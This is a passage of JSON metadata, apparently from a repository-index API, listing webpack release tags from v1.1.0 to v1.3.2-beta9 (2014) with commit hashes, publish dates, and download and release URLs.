ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256